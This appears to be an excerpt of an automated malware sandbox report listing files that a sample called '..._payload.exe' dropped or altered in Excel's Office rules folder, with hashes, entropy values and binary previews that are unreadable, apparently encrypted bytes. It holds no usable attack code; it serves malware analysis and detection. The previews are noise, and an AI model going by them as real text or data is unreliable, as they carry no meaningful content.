                                                                                                                          Preview:<?xmlc.[.gN.r.y...T......^...w...T-.../Y.!...g..?B..-....b.......z..a!.n...Z.5?.E.............(m....7!.....~._@...C....D..Q...-%.;.X.......w.ot7.....?...q..3=T....k.]....=......g9w.>.u~.L.e...D...8G..zq~..4.....9..v!oD..W...S\...X.....k.*u#Y.;..g.fd.....`HP......"...#....n....X...r..{v...d..i"6...6...j..J...g.e....R6...a...p..r.fS.0..w.S..y!.....W...~b.U.....pT;..s...A....q..T......zX.!%......,A!..z..28... ..,...#.....PS..j..5.%r..E.(...4...s.Wt..4"\....F...)...J......N`t..c;.....w..+&J...e.`.b..1.i..]w.C.Y7.qQ2../....%..pl.sC....Op..F.KX..X.Bys.B.....".qA.y...n.6...cS...mD4T.vdO..`TR..xpx....>qy#..k.......%.Ca..s!....B9..3..&.fV.={....*...b1T.N.!..........2-..."._.7.6.r..."......g|s..T.J.e.(..l..... K..N......|.5G..../...V..Yw....R..`....(+.m....c ..I.Z.HLB[6.H...U=..@..p.."....Y..;.4.,.<UKBz....az...;...t../...@..."G...(.....H#..x....o...C...=.....W.._....b.. !.u.q.h."."..9..r>-[^.......H..Jp.S...&+...#^..l.).%..%....7.t.,.U.?=.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule325001v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2318
                                                                                                                          Entropy (8bit):7.907045367770473
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:C47w6N+XmmGPakFpz1mQJV2sWXdAD9MhGk5JKX6CgZnkD:C47w6N+W1pz1mmosWX3NITuw
                                                                                                                          MD5:98BF09B53395C26A4CD97B9B32AEA4D4
                                                                                                                          SHA1:6EBC2803547CF508026FBE3306463DE43B580FDE
                                                                                                                          SHA-256:48CC1593BEB6E7BBFE001F911F85D0BAEBCC004A114657CC8DB86638F1771151
                                                                                                                          SHA-512:159E2FF0C6C3E11A2E33AA977D26DB8810892E35CC33FB7B95D11C72C6394F954FC9639DFA4092E16D7C3673F232651F4FDAE880542C352CE7071B8C46A56EE4
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml........ff......m.5.........|.......I...i........Pg~.w9.tWi.I..,#X...C..K..U9.........H.i...A.D./.C.~.Y@/...fp.P.*.\.!V)....m.q.:...Q..<........N.5..jl..\...W......PN...o..P.FQ.Ri...........*.-.....8B"$#...}.QZJ......A......F...Y.@.OT.{\...x{7.......,.z$.<.]..T..*./@....C^..0..o..Z[.........jC.....}x.J*[.|0R.f...,...D.<78Nd....-../...#..E.#'3..1...0.T.a.;*..0.}...>..>.;..0Z.....6..`....g&....W...b........a..#6.t..K...^.......'.2..'......9._y...........F.6>^9.7.k..{.-...$.......XnCb..;.W.Z.9{S..8.[. e..=.....0.....(S..y...'.E.nIox.,M....q....A...........)B....z.:(.&...}.#V..6...y..1.@...K..r.Qs..R;..r.z..T.......Y.....U(..a.... =.W...`.4.Pn...U.....".v.k...9....tf$..=Ip.E 1^$.f..U.."...w.`.?.x.Z..J...D....h6....-...]"...TnK...C)..%........k..S...y#..N.x..T.v.../..X.x".?}.W.qY.^E.m].QX....=../(...LYG..."....9.d.).=..sHZ\.........+s...`j7T..;...QZx.....c..S.A..I...X.....F..q..@.[L..O.#....o...U....rH.'.7..$..n...~....".]..b.Lf ..1...RT..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule325002v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2388
                                                                                                                          Entropy (8bit):7.915464194554425
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:xI+3/kmJR+NA6cPUAYaId8IxxwnKoP0ZXBnD:xIy/kmJR4A6b1aIsnYZ
                                                                                                                          MD5:1ECCD82DC8319E9639A4371404726B09
                                                                                                                          SHA1:88664F97D69E74639E9510F5178094398CA725B8
                                                                                                                          SHA-256:6D82BBD093F69163A0E4256D304D7AFE4FA153F291960F9FB8A4C1DE3FCA1BDF
                                                                                                                          SHA-512:06D5828EE60267B80872CD70D51393CCA4604EDA08326F66337035CE8B842887D7C5B76D67BAB42378D19EE2F17907F1683910168D0B4D5F5E5B661551AE079D
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml....p..3......y...m...(.f[/O.F.....BzZ.....P%3..\5.JO.....nF.9..w.1.Y....*..t.+2...2...`./E..D..].a"...V].M..9.. 4.a.Gm@......&.7..:..k).8.y.....N.+.K.f$.\.V.UC..-..`.....U.`...FE.W.g.6.{;..c....8CH.....v..e...Mg.A..(.........A.C..".......4.i....R..M{6P.[...ts..a..5.....-n...cg...].Z.....Z.I-dX.......c..F...'.....+H.. ..0..L.Hr..J.......0....R~...,..z.....d).%......?b...I..5............O...Y.....kBbM..!_)<>(.Q..%......~x....28t%Z.xZ..:....$.r.29.tt.R....Q(.;6.o.B\.;&...HcM...I...A.j[.G|g.uH..Z{M\.....R*....9..{..JX..m0.Oy...]..%E...^q.v.o....)h....o..Oi.x...O..K.RZ.2.Z.!.....n....TW.......x...N.U.4@..Z3.n.zq9ru...'....c..@....lA.FUT.r..K..........V+..I..&.]...VZ.v=R......r....../0;[....!.&..I..T%. ....]2..../.AH.^....q2..zo....t.a..7..t`-..O.....,...d..4L..a.q..0W..5.....Z.z..p...-...$.z.h.U...V....D......E.l.....taHf..Et.....K. .ea........,...Q\......[.W....../.:.5.b$...8O.,.....Wd...M.f.O...I...J6.:.S..;.%-..3,.r..k.....s|.Q.Y$>

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule360000v2.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1197
                                                                                                                          Entropy (8bit):7.818723810929094
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:sWNKaUKOHlwuxqL3YDZgj3Az/b1Hfgdtpo69MbD:HRUKOHDo3EZgjwzT1/yS6QD
                                                                                                                          MD5:2F0A77567F94316C475F5E790DB706B4
                                                                                                                          SHA1:B499C9382CCDEBA3B97A967CC9E4ACE92F886CEF
                                                                                                                          SHA-256:E2866F4679F74A04C87D3123920376B42FE28490A6700ECEC0BA9371F0BD822F
                                                                                                                          SHA-512:0901032CCBAFAB63F0F5DE2195E218829ECC0140745876DE87BCCB7AB744259777F60E041B03660CB030B72C61EB7AD84257712B3AF43A2CC8343DF6F698E31E
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.2..RB.+;.....@...(......L/.....@wK;....-.$|..k.1hUU.....h$.a..."f=.=.M..U.z.H.rML..uU..A&.W..mvO..0.`..".o.+.#.j.^.Y.&.+.8.H..0.4..QP...a.C..%.v..H.OH.?..Us4q$."..-.8m..<@<...k....-.*.L?.^&.........E...X....>#....J~>.!.Mt...\.1..d.....u3.Z.p../.B.E....E.x.tZ..3+...X......*..r..E..J...F..u....`...c\...Z.*.)[q.U.....t...Ab?Y.5.:..{96~....$.oHP(r.j89..}.+.*..g.O.|Bk..w...D_..5.>.. ....(.o..t...P.8...?....LN.h..........._,tbKj0T..z..^..f9n...i..{J.JO%c.zI_bE...A.1.c......G`..T.".L....M...R..x3.../..>sf.G..R.....I....pD..{.).;..Y...r.{.....w...C."8.B.....l".#...D.~^....0o...C..i.1...../w/..KP.C2B.>.....7C.=.6. ..]...M...{E.Qo..[-.......`.].q.......;G[4%.|...pk..........V.hpn./..6.+.i......V....D...(....h......2......L.R-e._........{_.}.....>.!.n....1...p..^..).c;I....3.-.Lh..j.A.u..H..F...0..}....../...?t...L.u{.(/...s.Q."....,('.............;fz:..../[E>.......^.S...S+..9.a..N.BV.F.......p>?.|9..f........#.2.c.v.Xm......}.......|BM...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule360001v2.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):771
                                                                                                                          Entropy (8bit):7.663568082084083
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:KwKooysLE3iFHbg/ynaH1k+KfxXcWyndIh3ykCx8kheZh5Vhq5bTcii9a:n7vsL6dKncDKZcDd0y7GqeZnVwbD
                                                                                                                          MD5:CD802C19B6FBFCE3B509B28A20764AAA
                                                                                                                          SHA1:8277BAAAFF239FF7E1C33BD91AAF34611208C1E2
                                                                                                                          SHA-256:8BE668FBF72698FBCBAEA1A9AE5217314ED9E36FB3A19AD133EA62CDA702CA5A
                                                                                                                          SHA-512:5D058EF2350DCEE3E86181541DCE43499101A2E0BEA98972352393D5D3F623BB32138A36F7D375308EC53B0CE723A6B0DBDCE3106CFC9AA78265CE9853DF14AF
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..$........@g.D.5!.o1.m<7T...;..QXv........R-p.u=.|..6......T..F..9.'$.n..&Bx.x.\.G........p{.F.6C.}>=D.CW..|..B.e..r8...D.}D._.......a..5P.D.O..y.e...;.V..Q..I;.$f4..Ao....yL..m..L.YJ..c9.............ow..3..C....kn.X..#.1|[..6o....e.x2.z......c..>[..... .O..G[@..7[...|..c .d.....1..A.-..\.%.$D...j.k....'.S4...Q.B.%e.Q..jp...9W.d.....7...rs0....&..I5|..].D.!v@..D.....KHN.:c..h....B3....I...a0o9..n.i.tk...DW.b..~......x7l.].-R.ff.2..tD.d..~...~.... X`.uy[......cj.L.;Y...T.{.......8q.H9..G9....Fh!L.q.....Xc..D.jt.]E|#....d...5...sZ........Mr...l\).M...P.h.....+..#.@.5}...r..w...o}).~..a.Gm....~.^1Y._#(...e.H.....K..|....p...."..X..u..<..w.>M...".k.p.{.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370000v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):863
                                                                                                                          Entropy (8bit):7.725509206501878
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:XrdrfT2B+SfR3+sKwEfJiIoItCQTUq6xtVpLbD:XrBfT2AmRswIoIXgq6jD
                                                                                                                          MD5:AD71D183F675397371CFB1C67B684379
                                                                                                                          SHA1:F6FEC341085D75DF961E517A832DB4D546FF516D
                                                                                                                          SHA-256:E1ED035A7C28C366DC83C96916B26077AD87A55E49AE89D9071897D08FDB4A07
                                                                                                                          SHA-512:B1392762A322DB6B55775FD1E81243A935B44F499074A5E8F80617E1C56507CFFCADAC929656C890E50688CF86C2A18448FF4FC698D98A10DCA98CE042C8F1F3
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml....j..9..h*.... ...4.f....q.zh;.-..7.....(......`.m.... ....}.D.K.....@.s(4...]..n.M..a...$.0.....@..l..E-..'....1(.C......_.V1..G.j~.+...(....hg.2..9..u...z.r...u-.....-%....T.G+o-.....O.3BA.1....,?.g.v^.O..8..-..<.F.-.&%tiq7\jW..K...y5....]......K....`'C.>...x.B..."F.....&-t.)K..g........=>.....F./..Q7.N...k$ua.....Mn]...T...x......q.fvL~(....:....r{.'-z.....uI.G..v.R}."tB.z......*..K>M.j....c3K..e....I.zeJ)Z...g....TB.`..c.%6V!Cff..K=Yk...5Yu..K....k..K..rd.*.8I..,.:?.%.R.s.'b...!.C(". ..~*-.P...5..P...ib...P...!....)D,..>.BY...8.../.../...lT,.......5..!.......WO...,Je>.>.`.?.J.....znR-.....;.{N..lS4^.....'Y*..rt.7......V.Y.=j%D..O.....B.?..C.......\....\..5...t...\....i..s...!.c..;...o...o.'l.@Y<.....q..d-7 ....9{.W..[^...,.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370001v2.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2604
                                                                                                                          Entropy (8bit):7.922913794113711
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:eK3ucXoxGyz97Z6LavsHTJZkXFY3cyfQU8Z56ZaSJ8SGOjcjPewSfPH5D:ZuXIWOSFccyT8ZufJAirfJ
                                                                                                                          MD5:E22F09EF08AADCF5A5243309BDC44D7B
                                                                                                                          SHA1:830AF810E6C317A7EBB796C2C6A8932E1D61A9B9
                                                                                                                          SHA-256:E80F85909E4FF84438BA05B2C7B690C726F0EBD84FEC8132F42EC6B84A6260AB
                                                                                                                          SHA-512:DF7C870672452BE57525E321E0958D1F90F816A839F5B6A7D5685AEDF2C67E377ED5FF87FEDC6682C43BE544EC95D96027A7AB248421B06E8C4A36B32BA1BF56
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..X....Q...e.om^'.....9..=./O.:cm[.iA..}..d$..R.C...4..+.*.-km...n..G.......|..D.V*.K..!...M.+.`.d.......X.g.<....G.....DDxw(...+.-..s.E....B...,...$E.k.R@1!..xw..]...r........'..3..=+}.......:UA...p.`*._.....d$....s....3*#|.r.i.=..A.g..VUp.i..WU.bhh..].J".1k...K\..I...j...........[E.m........H.6-.r...$f....<...D~.....z.>..R5>z.^3....l.....v.tv.M.0..._M..Z...'.M@.|HIE...B...6q.,.fm.3[...m.De..R.Mi.O.....rY>.A.~..#G...R...g.....b.w<.W<....0JK..K.U..8.7J.f...$}.x`}.]..L+..D.....!.. ....<.@.`..u...3...+:....G+.t.y. .%.....|AO3.<1..q../..<.pL...7......N..W6.KnM.Y..jFn Y..rA..j|...5....El.u.zPO..|(......!........1..2k....B&{.s??..F...K..\.%.`.<cP2x.J.|Y.UQ.fC6em:r...H......h.HQ^GB.....[ 6..U.Q.K.FY.rQu.Z!...Hi..vW...G.?2.[.....pX|X9M.k.........\A.....4.]Q.,..>.......<s.S...`.~...!...}.na..$.]'......m.r..=...jEa5.}#.6...o.h:.....J.!."]/.z>_..Z..............*.<...F....A&..K...w[..kY...}$.o..-.Qu%..C...^B..P...z.gf.6...b].}x\N^...%Q?..!....i#`.#

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370002v2.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6109
                                                                                                                          Entropy (8bit):7.968825978939554
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:1D0wJZr4Flj7ovYAGDz8JUrpZpANJDKMYG5M5x0Oy6U6FzrV3uo9jf4gljlCqlGU:F0wJZr4noQAGDwkjpANtJ5M5x+iXgqwM
                                                                                                                          MD5:4578729299F075A783C8FD46A1176279
                                                                                                                          SHA1:38194D30B6D997934A1F695EE6A817373FCF8133
                                                                                                                          SHA-256:F69A09CFC082336DA9FE6AB8C2279CEC1DBC3CA2C5F09800A12BD8E0F874AF80
                                                                                                                          SHA-512:75F86F0F0769D3482941A694FBBC811E48B5337ED35850203BBA3F22B03A633B191F8E0278DCCBB941E8A99BD76286D248F4D9C0AD02B42C5681822FE7F94513
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...yIl@.r3_...~..F.....4G..$p..2xl=..:..*...E....N.u..D.i.}..L..S.bybe.l.C..^jM.P......!3Y$].. ...V.$.Yo.h.<..W...30.f.=G..."..'B...4.d.%..P..-[.....rN.....s$...~..<u0.n...../h.t~..l.p.Sq.........Ru.B.76H}..E......!...c...H.........(..Q......L...0..%.....t.|.*..a..H'8Oi.g0.U...vP._...,.t_\qL.b7p_.Cr.,.....0i.;.o^6.`...Q...P......}f............{...D...9.cs..l`...W..vl..Q8...b*..1T....@).l.O%UX@...".P....j..;..9.yBC...{.t.......$....3ql...y....z.....`...)..fq.a...Be..U....?.../Y;.~.Njr.GV....@?j.H.........l...t..~7...o.MR...............E....g......\G.m.{L.......}.K>..i<.^...M.a*.....H<.2..u.Ctm...Gy..oh.]..~P.qA...'. .Q..J..L...s.....sB9mL..jv)Tg{.Q...d.......c...[....p...rx1....`..[.Zr....w.'h.q...+..\5@...W.f;..v.pm%5i...%W1....u.....uZ.."!4.3.....N.Y..&d..Up.=......NB.`..].'hm..r.t.N...EIH.v..3s..j........~=.%...M.....K.........m.._...$:./..:VX&......n9....+,w...K)....w....W.T.o.C.2.J|#...Q...6.@.,....=.C.!2M..5)..$...........

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370005v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1454
                                                                                                                          Entropy (8bit):7.872674657822242
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:jNeWHNWw5hB6al05SQEXMwO8XkO+/xbwkKUeSm6XM/eEO8cD0OAXD67V/mLnYLKh:jJWw5Kalx/KJxUkKUeSm6XoeEO1267VO
                                                                                                                          MD5:D9A1143224401757459B2F7CD0977E56
                                                                                                                          SHA1:7CF50226CDD5FE2FB0B823F32703EB28AB796630
                                                                                                                          SHA-256:CB9507550A541042538473A57BF4BB66C1373D1778CADDC84DADF3B2B363EBC2
                                                                                                                          SHA-512:96B9A7DC41C5A513EC59296045D34A33EABB141D4122E1E2411467832E77F1431E40A7E85C29D50F70736010FD1C6DAB84A89803B8797F97CD5DAE1B096D93A5
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...7....U`...]....5B.$......l,*...tk..&DJt.r.#k]i.(..OO.......e..`l..../..H...?...6'z".vc29.`...^....:.=..(pS|..9=..?T*l......XL....~4.....\..7%K#.S*.7P..&>..._T..L.9...H...I...91..q0.s.P>.A.X...t..C.9N..U.I.......................h...|6#t...-.$........9~g..}......|~...SC......d.v..h/...*...7......Un....<J....+'.h.\..;.)...T..@.*..C..`..le.U...a.;.O....Zgd.IP.u....n.1..e......6..<R..|.'.GC.J..5.hW.......2...f.}..../.......)}.".......+...o.j*.<..&g....'I6.....{7...*C.c..A`..sJQ.{*..-......N(.........K.K..u_#......"I..n...<.6.GUR2.~v.:q.a.U$.vzg.z.hl.8.h..a.=f=C...32.[g.^|..+n...R..UJA.7.,...t.........|.;.T..W.n...6..'.;Sbx.L.w.y..v]Q......&.?,...<.3W.e.3..'4..v..]e.....!.%Mx.l.].`....S..p~]#..Z...S.$._.$..A.,...j.........3.1o...+.Y.ny.:.T/.^V.....3....C........9...b.2....(....P.G.....B.7..? ".iWJ-.M.....FB6..~.5P....7.4)..8.s....gu}B.h.wx.....n.mi..h.x....).xPf..ZM....l..Q8T*Krj..J..&....B..#kN....Q2&..g..$t.3..)a..e....U

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370006v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1120
                                                                                                                          Entropy (8bit):7.771998687518319
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:cMCdV+nRuTzuHgkaJ9RYrVuvAcKA0sT9FHhHVbGo1n7d9Wo8UAkDbD:xG7l9RYrVu4c70+FHBVbb1d49UAkXD
                                                                                                                          MD5:1104567593F6DDC06DF6EABDC117FD90
                                                                                                                          SHA1:EC837CDDB2CDF3257DCC1816CCE20E8C3A4F7CEE
                                                                                                                          SHA-256:DEBB7F028730513E7C53FFB9DC9B7191682B90C81006EA7595DFDDFDC8E55B00
                                                                                                                          SHA-512:3737A0AA4F055DCF15FB47E8F305F2F7C107C492C666488B5E731285EAF027527F8A2F4ADD57F571C00CB7B151DEB17CB4FA7C765696A583896B1F1D159E5EBA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml....C..*.....~.g.H..6..Z.J7.\..Qe._.2.*.B.i.<.]*.p.a....'lw..G..CWnF..2\\..z..?;0..t.5...IV&..6%...........`*.....n....Z.....n%Ow...uh.@.<...<...!OOh..9k.<.5w.s.N.|.A.....,K..f.(E.c\.R....!p.c.m.3....W...kcH.<..<...+.};.:.hkTZ..8.....!`.J+.....Z:..A.P.a.+c....c....@..m.E.X.5L.....Xo.6)'...C..Yd.d..............}~.p......d.v...e.......[^I.p0.~.vH.).!.yE1....y....bb..u..`.).....Yw{.....W...I..w.My3.o.0..%JgpzI4U.d./.f.PkN<.pH.p.....-..z...e.a+.[w9.V6vS+.q.Z...}U.]......_6.{..)C....0..tj8\-......S..Vy8...T.X...Q..2k.G.>D.....[.?_X@..<.$.....G$%W.........5.G}n.c........c..Q.UZ..C......\{...F....mD...5.x.Iz.F"Q.o?..e.P.p.O:V.F.x[l.....D...r{..u~..X...:..tQDc.b&.N...P..Ue6.v....7...1..K.u.Hv.s......./9e..[&....@.1..c..._T.m....PD/.....Cbg8*.tU..]6.0.@..Y.id6......l..,...`Ynr..SE}.....oy.~h.A..:...O..?..+.f3..7D...$.\O.[.+w.x.I....D....V.c...WB:..Vx..l.].p...........".vZ..G.+h.|W...C.D.?n].4!.J..x..C........Q.>.*....;.GVZ.....Y.."E.r......7

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370007v3.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3678
                                                                                                                          Entropy (8bit):7.948418439480857
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:JZ3aOdShsKoNIQr3SW03jrLX9Ku2wTd9v5iavdgMA:r3aPhaay3SWQjrj9Ku535iadA
                                                                                                                          MD5:597884A102161BE3CD0CF3201B68E028
                                                                                                                          SHA1:FFD8998F44AC424475DF837F0DFBCF22A7380C64
                                                                                                                          SHA-256:8B30D43F3D72FD615D018081A92B082ABBFEAA290A6835AD8431DF922173B2F8
                                                                                                                          SHA-512:6239CC10C98773D9C7CFEB1C61E8EE9D04C081FE76424D2B1CD537D6A4A81E533F051F43742FF306A7B3D10D4583752962B61E41E086B1073AD26381E055EEEC
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml../..m;...t.^...wZd...%L...[Kk.H.o........>....ay..BH............s<..q.?..f...!.1..."j.<m...&..='..KJKs}......t..f.].<.<Z..AQ.'.v..2d.^..:........Nx...nw..,........ ./.>.0.....`.@.q1.O..75..k..>..[...=....7....23.+Kp;.B.....z".s+....G...B..|Rnv7..A.4z...h.T...m...*%.?..C!o@q.m,.4...i..Qrg.........k....8..<m\B.o?..5..m..G[..m....Wkj...=.\"./.].1.R..M.b....%.]......{m.*U.W.....5.h.V...<.}..<i...??..2..).p/_H,X.;b.i..l.....U5....v....$.L....K..~_.......-....;.....cu=/....rK.Q...O........I..@b..*..a......|LzR\....r......4...*v.T$...%.M.):8...= r.^k.j..D1U{.,..bv...|.....".YJ".....yf.%....%...*m.m.G.....nZ.6....o...I...KF&...v:R.Z.*..C............_..Fs.D4x.T....w-.o)\p.e.~.\...H....9......}G'..8o.`.%....`f..k.z.G...lh89.}>.v.......g).2..+......>....LZ;..wD...o$I.).;......F_34..Yi..4..[7.Dl....:.]Lm.<..[`:.Pe.........a....6.}Z...^=:...e.^q...37E.G.~.....].....@._E..K.....&.(..&P..x.U..x..j...tf3....|&...H.K*.?..V4.i...w.D..........<

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370009v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):961
                                                                                                                          Entropy (8bit):7.780754268888084
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:fZIN0gJtI3ml4NDV+qy6+pT1Rwdfu2MTKk0tIJFDbD:fsC3c2y5pT1Rezc7WIjD
                                                                                                                          MD5:002B8352677BFA42D3A8E06DF2E1F2D9
                                                                                                                          SHA1:D53EFFC712231D85AA8A62E355A8D1583C14D2A8
                                                                                                                          SHA-256:4DDE8FC37A9F17C477E183F7BF720DA47A4BEA2C4FB3B8C1452003EEF78F2A7E
                                                                                                                          SHA-512:D747131D0D396F9D32684093EA9965DDB80277D66B7C4025B4A334523583E38EAF81726CC2556F0240BD1A582A97CDE13B134498F86AFF1566017605678750D5
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..ABs|Q..Gj...|..d.4.E..8J.@...*Kq E...D...j8<.>OE9.8[...H.<.i(...1\/.~cAH.....M.H....Jw. 6|2P.aQ....4.g.}....Ln.S.N..".....].t.....0.....l+{HGs#.............*.UU.z..t........8q/h..../.mj.|....T...T..WI..@....o.}C,.z...b.u.]x.V...b...{8._......0..%n.Vj...<.!.2r.....S.8.J..8(93........V..P%t.8h...!ML.^u.|.w..s.....a....pm8.G`2.N.!.!..~.F.Q|...[........Z...Kxy...............uQ..?..h.&x7..V9....[.z8(;._k..v..bRTaH......'...&:^.a...0.$...w..;.[._...2%.]... .#!s.Z...."1..o.ul7.V.NAD..8e.-....#....%..7:Ue...E.y.1u..nk{w&.lvV\,.,..L......`...1h|.1..;.k..W......q.>.?.l.#o.....p....4..WY..YV.K4nK..0..z..M..d.Lnm.aX*.p.......1|.....G[...b.....n..R:....m.G.>....%2h..O..Uu.b....#.....Y.9...Rn".......S....e.....&..|..O|q...%Z......O.^#W...Y"3...#1+U.L..k=@.S."....r..8,.-ah..._...IB.bU..Z.=-.Xg.;"[.+..wN....&....ix...y....C?.H......phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370011v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1191
                                                                                                                          Entropy (8bit):7.817058048390644
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:ifDo5v3ifZzKEzTGoZ0++pT5ipr1Iw4Al3iBafvm8Gr81QzbfIpbD:L5afZztzp0++F0d1lRiMdUbfyD
                                                                                                                          MD5:D64D00A493FE166893708D213ADACB3D
                                                                                                                          SHA1:6F04FD43DBE40D90B78998B090645AC4BBCB6353
                                                                                                                          SHA-256:4A1CE2037336C68CA824D37AFA67102614258BACA36C92DD04F1B314DC2AF5D3
                                                                                                                          SHA-512:B5BA012E04B304658F74C3D071F38C8F6A6FFBECA34AEA924F2B1AE8A458E2FB4C97DA8804DFD93BF7E8B5D11BF7A233632196974331D49EA49514251AF449A8
                                                                                                                          Malicious:false
